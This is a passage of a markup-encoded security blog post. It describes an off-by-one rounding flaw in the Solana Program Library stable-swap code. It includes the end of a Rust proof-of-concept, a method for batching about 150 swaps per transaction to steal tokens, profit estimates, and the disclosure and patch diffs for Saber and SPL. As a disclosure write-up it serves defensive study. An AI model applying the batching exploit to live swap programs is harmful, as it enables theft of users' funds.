instructions",{"type":25,"tag":216,"props":7746,"children":7747},{"style":6953},[7748],{"type":31,"value":6956},{"type":25,"tag":216,"props":7750,"children":7751},{"style":7047},[7752],{"type":31,"value":7696},{"type":25,"tag":216,"props":7754,"children":7755},{"style":6964},[7756],{"type":31,"value":7757},"[];\n",{"type":25,"tag":216,"props":7759,"children":7761},{"class":6922,"line":7760},22,[7762],{"type":25,"tag":216,"props":7763,"children":7764},{"emptyLinePlaceholder":16},[7765],{"type":31,"value":7642},{"type":25,"tag":216,"props":7767,"children":7769},{"class":6922,"line":7768},23,[7770,7775,7779,7784,7788,7793],{"type":25,"tag":216,"props":7771,"children":7772},{"style":6947},[7773],{"type":31,"value":7774},"    instructions",{"type":25,"tag":216,"props":7776,"children":7777},{"style":6953},[7778],{"type":31,"value":179},{"type":25,"tag":216,"props":7780,"children":7781},{"style":7047},[7782],{"type":31,"value":7783},"push",{"type":25,"tag":216,"props":7785,"children":7786},{"style":6964},[7787],{"type":31,"value":1850},{"type":25,"tag":216,"props":7789,"children":7790},{"style":6947},[7791],{"type":31,"value":7792},"swap_instruction",{"type":25,"tag":216,"props":7794,"children":7795},{"style":6964},[7796],{"type":31,"value":7797},");\n",{"type":25,"tag":216,"props":7799,"children":7801},{"class":6922,"line":7800},24,[7802],{"type":25,"tag":216,"props":7803,"children":7804},{"emptyLinePlaceholder":16},[7805],{"type":31,"value":7642},{"type":25,"tag":216,"props":7807,"children":7809},{"class":6922,"line":7808},25,[7810,7815,7819,7824,7828,7832,7837,7841,7845,7850,7854,7858,7862],{"type":25,"tag":216,"props":7811,"children":7812},{"style":6947},[7813],{"type":31,"value":7814},"    env",{"type":25,"tag":216,"props":7816,"children":7817},{"style":6953},[7818],{"type":31,"value":179},{"type":25,"tag":216,"props":7820,"children":7821},{"style":7047},[7822],{"type":31,"value":7823},"execute_as_transaction",{"type":25,"tag":216,"props":7825,"children":7826},{"style":6964},[7827],{"type":31,"value":1850},{"type":25,"tag":216,"props":7829,"children":7830},{"style":6953},[7831],{"type":31,"value":7059},{"type":25,"tag":216,"props":7833,"children":7834},{"style":6947},[7835],{"type":31,"value":7836},"instructions",{"type":25,"tag":216,"props":7838,"children":7839},{"style":6964},[7840],{"type":31,"value":7026},{"type":25,"tag":216,"props":7842,"children":7843},{"style":6953},[7844],{"type":31,"value":7059},{"type":25,"tag":216,"props":7846,"children":7847},{"style":7047},[7848],{"type":31,"value":7849},"vec!",{"type":25,"tag":216,"props":7851,"children":7852},{"style":6964},[7853],{"type":31,"value":7701},{"type":25,"tag":216,"props":7855,"children":7856},{"style":6953},[7857],{"type":31,"value":7059},{"type":25,"tag":216,"props":7859,"children":7860},{"style":6947},[7861],{"type":31,"value":7493},{"type":25,"tag":216,"props":7863,"children":7864},{"style":6964},[7865],{"type":31,"value":7719},{"type":25,"tag":216,"props":7867,"children":7869},{"class":6922,"line":7868},26,[7870],{"type":25,"tag":216,"props":7871,"children":7872},{"style":6964},[7873],{"type":31,"value":7874},"}\n",{"type":25,"tag":38,"props":7876,"children":7877},{},[7878],{"type":31,"value":7879},"It works!",{"type":25,"tag":34,"props":7881,"children":7882},{},[7883],{"type":25,"tag":38,"props":7884,"children":7885},{},[7886],{"type":31,"value":7887},"holy shit\nyea, this is big",{"type":25,"tag":38,"props":7889,"children":7890},{},[7891],{"type":25,"tag":6467,"props":7892,"children":7894},{"alt":7,"src":7893},"/posts/spl-swap/poc.png",[],{"type":25,"tag":26,"props":7896,"children":7898},{"id":7897},"exploitability",[7899],{"type":31,"value":7900},"Exploitability",{"type":25,"tag":38,"props":7902,"children":7903},{},[7904],{"type":31,"value":7905},"Off-by-one bugs are much easier to exploit on Solana compared to other chains, enabled by the relatively low fees on Solana.",{"type":25,"tag":38,"props":7907,"children":7908},{},[7909],{"type":31,"value":7910},"A single swap on Ethereum can cost dozens of dollars, but on Solana packing hundreds of swap instructions into a single transaction costs the same flat rate of 5000 lamports (at least prior to the 1.9 per transaction size compute limit update).",{"type":25,"tag":38,"props":7912,"children":7913},{},[7914],{"type":31,"value":7915},"This transaction cost discrepancy can trip up developers who transitioned from Ethereum to Solana. For example, the developers who wrote tests for the Solana Program Library implementation of stable swap assumed the impact of an off by one error would be negligible.",{"type":25,"tag":38,"props":7917,"children":7918},{},[7919],{"type":25,"tag":6467,"props":7920,"children":7922},{"alt":7,"src":7921},"/posts/spl-swap/pr.png",[],{"type":25,"tag":38,"props":7924,"children":7925},{},[7926,7928,7933],{"type":31,"value":7927},"As we mentioned previously, due to the rounding error, each swap allowed an attacker to steal a single token. It's important to keep in mind that this represents a single token ",{"type":25,"tag":64,"props":7929,"children":7930},{},[7931],{"type":31,"value":7932},"per instruction",{"type":31,"value":7934},". Transactions on Solana can also contain multiple instructions.",{"type":25,"tag":38,"props":7936,"children":7937},{},[7938],{"type":31,"value":7939},"With an onchain program, we are able to fit over 50 swap instructions per transaction. Each transaction can be run around 3 times before exceeding the per-instruction compute limit cap. Thus, we can pack around 150 invocations per transaction.",{"type":25,"tag":38,"props":7941,"children":7942},{},[7943,7945,7950],{"type":31,"value":7944},"Some quick napkin math confirms that this ",{"type":25,"tag":64,"props":7946,"children":7947},{},[7948],{"type":31,"value":7949},"is",{"type":31,"value":7951}," indeed profitable. At a price of $41440 per Bitcoin, we are able to steal around 6 cents per transaction.",{"type":25,"tag":38,"props":7953,"children":7954},{},[7955],{"type":25,"tag":82,"props":7956,"children":7958},{"className":7957},[212,4702],[7959],{"type":25,"tag":216,"props":7960,"children":7962},{"className":7961},[224],[7963],{"type":25,"tag":216,"props":7964,"children":7966},{"className":7965,"ariaHidden":230},[229],[7967,8056,8108,8146],{"type":25,"tag":216,"props":7968,"children":7970},{"className":7969},[235],[7971,7976,7981,8032,8042,8046,8052],{"type":25,"tag":216,"props":7972,"children":7975},{"className":7973,"style":7974},[240],"height:0.8141em;",[],{"type":25,"tag":216,"props":7977,"children":7979},{"className":7978},[246],[7980],{"type":31,"value":184},{"type":25,"tag":216,"props":7982,"children":7984},{"className":7983},[246],[7985,7990],{"type":25,"tag":216,"props":7986,"children":7988},{"className":7987},[246],[7989],{"type":31,"value":1882},{"type":25,"tag":216,"props":7991,"children":7993},{"className":7992},[2159],[7994],{"type":25,"tag":216,"props":7995,"children":7997},{"className":7996},[298],[7998],{"type":25,"tag":216,"props":7999,"children":8001},{"className":8000},[304],[8002],{"type":25,"tag":216,"props":8003,"children":8005},{"className":8004,"style":7974},[309],[8006],{"type":25,"tag":216,"props":8007,"children":8008},{"style":6104},[8009,8013],{"type":25,"tag":216,"props":8010,"children":8012},{"className":8011,"style":2181},[319],[],{"type":25,"tag":216,"props":8014,"children":8016},{"className":8015},[2186,2187,2188,2189],[8017],{"type":25,"tag":216,"props":8018,"children":8020},{"className":8019},[246,2189],[8021,8026],{"type":25,"tag":216,"props":8022,"children":8024},{"className":8023},[246,2189],[8025],{"type":31,"value":3378},{"type":25,"tag":216,"props":8027,"children":8029},{"className":8028},[246,2189],[8030],{"type":31,"value":8031},"8",{"type":25,"tag":216,"props":8033,"children":8035},{"className":8034},[246,31],[8036],{"type":25,"tag":216,"props":8037,"children":8039},{"className":8038},[246],[8040],{"type":31,"value":8041}," BTC",{"type":25,"tag":216,"props":8043,"children":8045},{"className":8044,"style":335},[257],[],{"type":25,"tag":216,"props":8047,"children":8049},{"className":8048},[340],[8050],{"type":31,"value":8051},"∗",{"type":25,"tag":216,"props":8053,"children":8055},{"className":8054,"style":335},[257],[],{"type":25,"tag":216,"props":8057,"children":8059},{"className":8058},[235],[8060,8064,8070,8075,8079,8085,8095,8099,8104],{"type":25,"tag":216,"props":8061,"children":8063},{"className":8062,"style":5513},[240],[],{"type":25,"tag":216,"props":8065,"children":8067},{"className":8066},[246],[8068],{"type":31,"value":8069},"$41",{"type":25,"tag":216,"props":8071,"children":8073},{"className":8072},[1864],[8074],{"type":31,"value":1867},{"type":25,"tag":216,"props":8076,"children":8078},{"className":8077,"style":1871},[257],[],{"type":25,"tag":216,"props":8080,"children":8082},{"className":8081},[246],[8083],{"type":31,"value":8084},"400/",{"type":25,"tag":216,"props":8086,"children":8088},{"className":8087},[246,31],[8089],{"type":25,"tag":216,"props":8090,"children":8092},{"className":8091},[246],[8093],{"type":31,"value":8094},"BTC",{"type":25,"tag":216,"props":8096,"children":8098},{"className":8097,"style":335},[257],[],{"type":25,"tag":216,"props":8100,"children":8102},{"className":8101},[340],[8103],{"type":31,"value":8051},{"type":25,"tag":216,"props":8105,"children":8107},{"className":8106,"style":335},[257],[],{"type":25,"tag":216,"props":8109,"children":8111},{"className":8110},[235],[8112,8117,8123,8133,8137,8142],{"type":25,"tag":216,"props":8113,"children":8116},{"className":8114,"style":8115},[240],"height:0.8389em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":8118,"children":8120},{"className":8119},[246],[8121],{"type":31,"value":8122},"150",{"type":25,"tag":216,"props":8124,"children":8126},{"className":8125},[246,31],[8127],{"type":25,"tag":216,"props":8128,"children":8130},{"className":8129},[246],[8131],{"type":31,"value":8132}," swaps",{"type":25,"tag":216,"props":8134,"children":8136},{"className":8135,"style":258},[257],[],{"type":25,"tag":216,"props":8138,"children":8140},{"className":8139},[263],[8141],{"type":31,"value":266},{"type":25,"tag":216,"props":8143,"children":8145},{"className":8144,"style":258},[257],[],{"type":25,"tag":216,"props":8147,"children":8149},{"className":8148},[235],[8150,8155],{"type":25,"tag":216,"props":8151,"children":8154},{"className":8152,"style":8153},[240],"height:0.8056em;vertical-align:-0.0556em;",[],{"type":25,"tag":216,"props":8156,"children":8158},{"className":8157},[246],[8159],{"type":31,"value":8160},"$0.0621",{"type":25,"tag":38,"props":8162,"children":8163},{},[8164],{"type":31,"value":8165},"At 200 transactions per second, we can extract just over a million dollars per day.",{"type":25,"tag":38,"props":8167,"children":8168},{},[8169],{"type":31,"value":8170},"We're well on our way to becoming a millionaire!",{"type":25,"tag":26,"props":8172,"children":8174},{"id":8173},"patch",[8175],{"type":31,"value":8176},"Patch",{"type":25,"tag":38,"props":8178,"children":8179},{},[8180],{"type":31,"value":8181},"Now that we had a proof-of-concept going, it was time to contact the relevant teams.",{"type":25,"tag":38,"props":8183,"children":8184},{},[8185],{"type":31,"value":8186},"By grepping through Solana logs for the swap instruction log, we were able to identify many potential spl-token-swap forks.",{"type":25,"tag":206,"props":8188,"children":8192},{"code":8189,"language":8190,"meta":7,"className":8191,"style":7},"solana logs -um | grep 'Instruction: Swap' -B1\n","bash","language-bash shiki shiki-themes slack-dark",[8193],{"type":25,"tag":82,"props":8194,"children":8195},{"__ignoreMap":7},[8196],{"type":25,"tag":216,"props":8197,"children":8198},{"class":6922,"line":6923},[8199,8203,8209,8214,8219,8224,8229],{"type":25,"tag":216,"props":8200,"children":8201},{"style":7047},[8202],{"type":31,"value":6815},{"type":25,"tag":216,"props":8204,"children":8206},{"style":8205},"--shiki-default:#CE9178",[8207],{"type":31,"value":8208}," logs",{"type":25,"tag":216,"props":8210,"children":8211},{"style":8205},[8212],{"type":31,"value":8213}," -um",{"type":25,"tag":216,"props":8215,"children":8216},{"style":6953},[8217],{"type":31,"value":8218}," |",{"type":25,"tag":216,"props":8220,"children":8221},{"style":7047},[8222],{"type":31,"value":8223}," grep",{"type":25,"tag":216,"props":8225,"children":8226},{"style":8205},[8227],{"type":31,"value":8228}," 'Instruction: Swap'",{"type":25,"tag":216,"props":8230,"children":8231},{"style":8205},[8232],{"type":31,"value":8233}," -B1\n",{"type":25,"tag":38,"props":8235,"children":8236},{},[8237],{"type":31,"value":8238},"With some Google dorking, we were able to identify many of these programs.",{"type":25,"tag":206,"props":8240,"children":8242},{"code":8241},"1SoLTvbiicqXZ3MJmnTL2WYXKLYpuxwHpa4yYrVQaMZ  - \"1 SOL\"\n9W959DqEETiGZocYWCQPaJ6sBmUzgfxXfqGeTEdp3aQP - Orca Swap Program v2\nSCHAtsf8mbjyjiv4LkhLKutTf6JnZAbdJKFkXQNMFHZ  - \"Sencha Swap\"\nSSwapUtytfBdBn1b9NUGG6foMVPtcWgpRU32HToDUZr  - \"Saros Swap\"\nSSwpkEEcbUqx4vtoEByFjSkhKdCT862DNVb52nZg1UZ  - Saber Stable Swap Program\nSSwpMgqNDsyV7mAgN9ady4bDVu5ySjmmXejXvy2vLt1  - Step Finance Swap Program\nSwaPpA9LAaLfeLi3a68M4DjnLqgtticKg6CnyNwgAC8  - Swap Program\n",[8243],{"type":25,"tag":82,"props":8244,"children":8245},{"__ignoreMap":7},[8246],{"type":31,"value":8241},{"type":25,"tag":38,"props":8248,"children":8249},{},[8250],{"type":31,"value":8251},"Now it was time to contact these teams.",{"type":25,"tag":38,"props":8253,"children":8254},{},[8255],{"type":31,"value":8256},"Of these protocols, Saber was the only one which had BTC stable swaps, which would make exploitation immediately profitable. Luckily, they were also the most responsive, triaging and patching the vulnerability in just over one day.",{"type":25,"tag":38,"props":8258,"children":8259},{},[8260],{"type":31,"value":8261},"After some discussion, they decided to port a patch from Curve.fi, subtracting one from the output amount.",{"type":25,"tag":206,"props":8263,"children":8265},{"code":8264,"language":6914,"meta":7,"className":6915,"style":7},"-        let dy = swap_destination_amount.checked_sub(y)?;\n+        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n+        let dy = swap_destination_amount.checked_sub(y)?.checked_sub(1)?;\n",[8266],{"type":25,"tag":82,"props":8267,"children":8268},{"__ignoreMap":7},[8269,8323,8335],{"type":25,"tag":216,"props":8270,"children":8271},{"class":6922,"line":6923},[8272,8277,8281,8286,8290,8295,8299,8303,8307,8311,8315,8319],{"type":25,"tag":216,"props":8273,"children":8274},{"style":6953},[8275],{"type":31,"value":8276},"-",{"type":25,"tag":216,"props":8278,"children":8279},{"style":6936},[8280],{"type":31,"value":7011},{"type":25,"tag":216,"props":8282,"children":8283},{"style":6947},[8284],{"type":31,"value":8285}," dy",{"type":25,"tag":216,"props":8287,"children":8288},{"style":6953},[8289],{"type":31,"value":6956},{"type":25,"tag":216,"props":8291,"children":8292},{"style":6947},[8293],{"type":31,"value":8294}," swap_destination_amount",{"type":25,"tag":216,"props":8296,"children":8297},{"style":6953},[8298],{"type":31,"value":179},{"type":25,"tag":216,"props":8300,"children":8301},{"style":7047},[8302],{"type":31,"value":7184},{"type":25,"tag":216,"props":8304,"children":8305},{"style":6964},[8306],{"type":31,"value":1850},{"type":25,"tag":216,"props":8308,"children":8309},{"style":6947},[8310],{"type":31,"value":7064},{"type":25,"tag":216,"props":8312,"children":8313},{"style":6964},[8314],{"type":31,"value":1888},{"type":25,"tag":216,"props":8316,"children":8317},{"style":6953},[8318],{"type":31,"value":604},{"type":25,"tag":216,"props":8320,"children":8321},{"style":6964},[8322],{"type":31,"value":6967},{"type":25,"tag":216,"props":8324,"children":8325},{"class":6922,"line":6769},[8326,8330],{"type":25,"tag":216,"props":8327,"children":8328},{"style":6953},[8329],{"type":31,"value":3539},{"type":25,"tag":216,"props":8331,"children":8332},{"style":6927},[8333],{"type":31,"value":8334},"        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n",{"type":25,"tag":216,"props":8336,"children":8337},{"class":6922,"line":6778},[8338,8342,8346,8350,8354,8358,8362,8366,8370,8374,8378,8382,8386,8390,8394,8398,8402],{"type":25,"tag":216,"props":8339,"children":8340},{"style":6953},[8341],{"type":31,"value":3539},{"type":25,"tag":216,"props":8343,"children":8344},{"style":6936},[8345],{"type":31,"value":7011},{"type":25,"tag":216,"props":8347,"children":8348},{"style":6947},[8349],{"type":31,"value":8285},{"type":25,"tag":216,"props":8351,"children":8352},{"style":6953},[8353],{"type":31,"value":6956},{"type":25,"tag":216,"props":8355,"children":8356},{"style":6947},[8357],{"type":31,"value":8294},{"type":25,"tag":216,"props":8359,"children":8360},{"style":6953},[8361],{"type":31,"value":179},{"type":25,"tag":216,"props":8363,"children":8364},{"style":7047},[8365],{"type":31,"value":7184},{"type":25,"tag":216,"props":8367,"children":8368},{"style":6964},[8369],{"type":31,"value":1850},{"type":25,"tag":216,"props":8371,"children":8372},{"style":6947},[8373],{"type":31,"value":7064},{"type":25,"tag":216,"props":8375,"children":8376},{"style":6964},[8377],{"type":31,"value":1888},{"type":25,"tag":216,"props":8379,"children":8380},{"style":6953},[8381],{"type":31,"value":7081},{"type":25,"tag":216,"props":8383,"children":8384},{"style":7047},[8385],{"type":31,"value":7184},{"type":25,"tag":216,"props":8387,"children":8388},{"style":6964},[8389],{"type":31,"value":1850},{"type":25,"tag":216,"props":8391,"children":8392},{"style":6989},[8393],{"type":31,"value":184},{"type":25,"tag":216,"props":8395,"children":8396},{"style":6964},[8397],{"type":31,"value":1888},{"type":25,"tag":216,"props":8399,"children":8400},{"style":6953},[8401],{"type":31,"value":604},{"type":25,"tag":216,"props":8403,"children":8404},{"style":6964},[8405],{"type":31,"value":6967},{"type":25,"tag":38,"props":8407,"children":8408},{},[8409,8411,8418],{"type":31,"value":8410},"For reference, here is the ",{"type":25,"tag":162,"props":8412,"children":8415},{"href":8413,"rel":8414},"https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466",[166],[8416],{"type":31,"value":8417},"Curve.fi implementation",{"type":31,"value":179},{"type":25,"tag":206,"props":8420,"children":8424},{"code":8421,"language":8422,"meta":7,"className":8423,"style":7},"    dy: uint256 = xp[j] - y - 1  # -1 just in case there were some rounding errors\n    dy_fee: uint256 = dy * self.fee / FEE_DENOMINATOR\n","solidity","language-solidity shiki shiki-themes slack-dark",[8425],{"type":25,"tag":82,"props":8426,"children":8427},{"__ignoreMap":7},[8428,8490],{"type":25,"tag":216,"props":8429,"children":8430},{"class":6922,"line":6923},[8431,8436,8440,8445,8449,8454,8458,8463,8467,8472,8477,8481,8485],{"type":25,"tag":216,"props":8432,"children":8433},{"style":6964},[8434],{"type":31,"value":8435},"    dy",{"type":25,"tag":216,"props":8437,"children":8438},{"style":6953},[8439],{"type":31,"value":1472},{"type":25,"tag":216,"props":8441,"children":8442},{"style":7375},[8443],{"type":31,"value":8444}," uint256",{"type":25,"tag":216,"props":8446,"children":8447},{"style":6953},[8448],{"type":31,"value":6956},{"type":25,"tag":216,"props":8450,"children":8451},{"style":6964},[8452],{"type":31,"value":8453}," xp[j] ",{"type":25,"tag":216,"props":8455,"children":8456},{"style":6953},[8457],{"type":31,"value":8276},{"type":25,"tag":216,"props":8459,"children":8460},{"style":6964},[8461],{"type":31,"value":8462}," y ",{"type":25,"tag":216,"props":8464,"children":8465},{"style":6953},[8466],{"type":31,"value":8276},{"type":25,"tag":216,"props":8468,"children":8469},{"style":6989},[8470],{"type":31,"value":8471}," 1",{"type":25,"tag":216,"props":8473,"children":8474},{"style":6964},[8475],{"type":31,"value":8476},"  # ",{"type":25,"tag":216,"props":8478,"children":8479},{"style":6953},[8480],{"type":31,"value":8276},{"type":25,"tag":216,"props":8482,"children":8483},{"style":6989},[8484],{"type":31,"value":184},{"type":25,"tag":216,"props":8486,"children":8487},{"style":6964},[8488],{"type":31,"value":8489}," just in case there were some rounding errors\n",{"type":25,"tag":216,"props":8491,"children":8492},{"class":6922,"line":6769},[8493,8498,8502,8506,8510,8515,8520,8525,8529],{"type":25,"tag":216,"props":8494,"children":8495},{"style":6964},[8496],{"type":31,"value":8497},"    dy_fee",{"type":25,"tag":216,"props":8499,"children":8500},{"style":6953},[8501],{"type":31,"value":1472},{"type":25,"tag":216,"props":8503,"children":8504},{"style":7375},[8505],{"type":31,"value":8444},{"type":25,"tag":216,"props":8507,"children":8508},{"style":6953},[8509],{"type":31,"value":6956},{"type":25,"tag":216,"props":8511,"children":8512},{"style":6964},[8513],{"type":31,"value":8514}," dy ",{"type":25,"tag":216,"props":8516,"children":8517},{"style":6953},[8518],{"type":31,"value":8519},"*",{"type":25,"tag":216,"props":8521,"children":8522},{"style":6964},[8523],{"type":31,"value":8524}," self.fee ",{"type":25,"tag":216,"props":8526,"children":8527},{"style":6953},[8528],{"type":31,"value":5755},{"type":25,"tag":216,"props":8530,"children":8531},{"style":6964},[8532],{"type":31,"value":8533}," FEE_DENOMINATOR\n",{"type":25,"tag":38,"props":8535,"children":8536},{},[8537,8539,8546],{"type":31,"value":8538},"We originally thought this was an additional patch that didn't get ported over to Solana. However, it turns out this code was actually included in the ",{"type":25,"tag":162,"props":8540,"children":8543},{"href":8541,"rel":8542},"https://github.com/curvefi/curve-contract/commit/0fd801df7488d89f0e2fc81e760942d7858b01d6",[166],[8544],{"type":31,"value":8545},"original commit",{"type":31,"value":8547},", not as an additional security patch.",{"type":25,"tag":206,"props":8549,"children":8551},{"code":8550},"commit 0fd801df7488d89f0e2fc81e760942d7858b01d6\nAuthor: Ben Hauser \u003Cben@hauser.id>\nDate:   Mon Aug 31 02:35:30 2020 +0300\n\n    feat: add base pool without lending\n",[8552],{"type":25,"tag":82,"props":8553,"children":8554},{"__ignoreMap":7},[8555],{"type":31,"value":8550},{"type":25,"tag":38,"props":8557,"children":8558},{},[8559,8561,8568],{"type":31,"value":8560},"The commit adding stable swaps to SPL was ",{"type":25,"tag":162,"props":8562,"children":8565},{"href":8563,"rel":8564},"https://github.com/solana-labs/solana-program-library/commit/d62ddd2b94d5d2daaa97460b165d288610a87623",[166],[8566],{"type":31,"value":8567},"made a few months later",{"type":31,"value":8569},", meaning there was some disconnect when porting the code. Either the rounding was thought to be unnecesary, or it was simply forgotten.",{"type":25,"tag":206,"props":8571,"children":8573},{"code":8572},"commit d62ddd2b94d5d2daaa97460b165d288610a87623\nAuthor: Yuriy Savchenko \u003Cyuriy.savchenko@gmail.com>\nDate:   Tue Nov 17 15:13:18 2020 +0200\n\n    Added stable curve invariant to the token swap smart contract (#838)\n\n    * Added stable curve invariant to the token swap smart contract\n\n    * Fixed formatting\n\n    * Added missing stable curve constraints\n\n    * Symbol renames to make math clearer\n\n    * Small refactoring according to PR comments, fixes for JS tests\n",[8574],{"type":25,"tag":82,"props":8575,"children":8576},{"__ignoreMap":7},[8577],{"type":31,"value":8572},{"type":25,"tag":38,"props":8579,"children":8580},{},[8581,8583,8590],{"type":31,"value":8582},"After contacting some other swap projects which were unaffected, we decided to notify the Solana team in order to get a patch upstreamed to ",{"type":25,"tag":162,"props":8584,"children":8587},{"href":8585,"rel":8586},"https://github.com/solana-labs/solana-program-library",[166],[8588],{"type":31,"value":8589},"the Solana Program Library",{"type":31,"value":179},{"type":25,"tag":38,"props":8592,"children":8593},{},[8594],{"type":31,"value":8595},"While few projects deploy the swap program from the Solana Program Library, the SPL program is meant as a reference implementation, and many exchanges fork their own code off of it.",{"type":25,"tag":38,"props":8597,"children":8598},{},[8599,8606],{"type":25,"tag":162,"props":8600,"children":8603},{"href":8601,"rel":8602},"https://github.com/joncinque",[166],[8604],{"type":31,"value":8605},"@joncinque",{"type":31,"value":8607}," helped triage this patch. We also asked him for his thoughts on a more complete solution.",{"type":25,"tag":34,"props":8609,"children":8610},{},[8611],{"type":25,"tag":38,"props":8612,"children":8613},{},[8614],{"type":31,"value":8615},"Honestly, the idea of just subtracting 1 from the output will cover almost all situations correctly, so it's a good quick solution. I'll take a look to see if we can solve this for all situations through a correct application of checked_ceil_div, as with the constant product curve.",{"type":25,"tag":38,"props":8617,"children":8618},{},[8619,8621,8628,8630,8636],{"type":31,"value":8620},"After some thought, he helped ",{"type":25,"tag":162,"props":8622,"children":8625},{"href":8623,"rel":8624},"https://github.com/solana-labs/solana-program-library/pull/2942",[166],[8626],{"type":31,"value":8627},"introduce a PR",{"type":31,"value":8629}," which ceilings the computation in ",{"type":25,"tag":82,"props":8631,"children":8633},{"className":8632},[],[8634],{"type":31,"value":8635},"compute_new_destination_amount",{"type":31,"value":8637}," to correctly round within the stable curve math library.",{"type":25,"tag":206,"props":8639,"children":8641},{"code":8640,"language":6914,"meta":7,"className":6915,"style":7},"     // Solve for y by approximating: y**2 + b*y = c\n     let mut y_prev: U256;\n     let mut y = d_val;\n     for _ in 0..ITERATIONS {\n-        y_prev = y;\n-        y = (checked_u8_power(&y, 2)?.checked_add(c)?)\n-            .checked_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n-        if y == y_prev {\n+        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n+            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n+        if y_new == y {\n             break;\n+        } else {\n+            y = y_new;\n         }\n",[8642],{"type":25,"tag":82,"props":8643,"children":8644},{"__ignoreMap":7},[8645,8653,8683,8710,8738,8762,8838,8942,8969,9064,9167,9194,9206,9225,9248],{"type":25,"tag":216,"props":8646,"children":8647},{"class":6922,"line":6923},[8648],{"type":25,"tag":216,"props":8649,"children":8650},{"style":6927},[8651],{"type":31,"value":8652},"     // Solve for y by approximating: y**2 + b*y = c\n",{"type":25,"tag":216,"props":8654,"children":8655},{"class":6922,"line":6769},[8656,8661,8665,8670,8674,8679],{"type":25,"tag":216,"props":8657,"children":8658},{"style":6936},[8659],{"type":31,"value":8660},"     let",{"type":25,"tag":216,"props":8662,"children":8663},{"style":6936},[8664],{"type":31,"value":6944},{"type":25,"tag":216,"props":8666,"children":8667},{"style":6947},[8668],{"type":31,"value":8669}," y_prev",{"type":25,"tag":216,"props":8671,"children":8672},{"style":6953},[8673],{"type":31,"value":1472},{"type":25,"tag":216,"props":8675,"children":8676},{"style":7375},[8677],{"type":31,"value":8678}," U256",{"type":25,"tag":216,"props":8680,"children":8681},{"style":6964},[8682],{"type":31,"value":6967},{"type":25,"tag":216,"props":8684,"children":8685},{"class":6922,"line":6778},[8686,8690,8694,8698,8702,8706],{"type":25,"tag":216,"props":8687,"children":8688},{"style":6936},[8689],{"type":31,"value":8660},{"type":25,"tag":216,"props":8691,"children":8692},{"style":6936},[8693],{"type":31,"value":6944},{"type":25,"tag":216,"props":8695,"children":8696},{"style":6947},[8697],{"type":31,"value":6950},{"type":25,"tag":216,"props":8699,"children":8700},{"style":6953},[8701],{"type":31,"value":6956},{"type":25,"tag":216,"props":8703,"children":8704},{"style":6947},[8705],{"type":31,"value":6961},{"type":25,"tag":216,"props":8707,"children":8708},{"style":6964},[8709],{"type":31,"value":6967},{"type":25,"tag":216,"props":8711,"children":8712},{"class":6922,"line":7005},[8713,8718,8722,8726,8730,8734],{"type":25,"tag":216,"props":8714,"children":8715},{"style":6973},[8716],{"type":31,"value":8717},"     for",{"type":25,"tag":216,"props":8719,"children":8720},{"style":6947},[8721],{"type":31,"value":6981},{"type":25,"tag":216,"props":8723,"children":8724},{"style":6936},[8725],{"type":31,"value":6986},{"type":25,"tag":216,"props":8727,"children":8728},{"style":6989},[8729],{"type":31,"value":6992},{"type":25,"tag":216,"props":8731,"children":8732},{"style":6953},[8733],{"type":31,"value":6997},{"type":25,"tag":216,"props":8735,"children":8736},{"style":6964},[8737],{"type":31,"value":7002},{"type":25,"tag":216,"props":8739,"children":8740},{"class":6922,"line":7110},[8741,8745,8750,8754,8758],{"type":25,"tag":216,"props":8742,"children":8743},{"style":6953},[8744],{"type":31,"value":8276},{"type":25,"tag":216,"props":8746,"children":8747},{"style":6947},[8748],{"type":31,"value":8749},"        y_prev",{"type":25,"tag":216,"props":8751,"children":8752},{"style":6953},[8753],{"type":31,"value":6956},{"type":25,"tag":216,"props":8755,"children":8756},{"style":6947},[8757],{"type":31,"value":6950},{"type":25,"tag":216,"props":8759,"children":8760},{"style":6964},[8761],{"type":31,"value":6967},{"type":25,"tag":216,"props":8763,"children":8764},{"class":6922,"line":7216},[8765,8769,8774,8778,8782,8786,8790,8794,8798,8802,8806,8810,8814,8818,8822,8826,8830,8834],{"type":25,"tag":216,"props":8766,"children":8767},{"style":6953},[8768],{"type":31,"value":8276},{"type":25,"tag":216,"props":8770,"children":8771},{"style":6947},[8772],{"type":31,"value":8773},"        y",{"type":25,"tag":216,"props":8775,"children":8776},{"style":6953},[8777],{"type":31,"value":6956},{"type":25,"tag":216,"props":8779,"children":8780},{"style":6964},[8781],{"type":31,"value":7016},{"type":25,"tag":216,"props":8783,"children":8784},{"style":7047},[8785],{"type":31,"value":7050},{"type":25,"tag":216,"props":8787,"children":8788},{"style":6964},[8789],{"type":31,"value":1850},{"type":25,"tag":216,"props":8791,"children":8792},{"style":6953},[8793],{"type":31,"value":7059},{"type":25,"tag":216,"props":8795,"children":8796},{"style":6947},[8797],{"type":31,"value":7064},{"type":25,"tag":216,"props":8799,"children":8800},{"style":6964},[8801],{"type":31,"value":7026},{"type":25,"tag":216,"props":8803,"children":8804},{"style":6989},[8805],{"type":31,"value":331},{"type":25,"tag":216,"props":8807,"children":8808},{"style":6964},[8809],{"type":31,"value":1888},{"type":25,"tag":216,"props":8811,"children":8812},{"style":6953},[8813],{"type":31,"value":7081},{"type":25,"tag":216,"props":8815,"children":8816},{"style":7047},[8817],{"type":31,"value":7086},{"type":25,"tag":216,"props":8819,"children":8820},{"style":6964},[8821],{"type":31,"value":1850},{"type":25,"tag":216,"props":8823,"children":8824},{"style":6947},[8825],{"type":31,"value":2254},{"type":25,"tag":216,"props":8827,"children":8828},{"style":6964},[8829],{"type":31,"value":1888},{"type":25,"tag":216,"props":8831,"children":8832},{"style":6953},[8833],{"type":31,"value":604},{"type":25,"tag":216,"props":8835,"children":8836},{"style":6964},[8837],{"type":31,"value":7107},{"type":25,"tag":216,"props":8839,"children":8840},{"class":6922,"line":7244},[8841,8845,8849,8854,8858,8862,8866,8870,8874,8878,8882,8886,8890,8894,8898,8902,8906,8910,8914,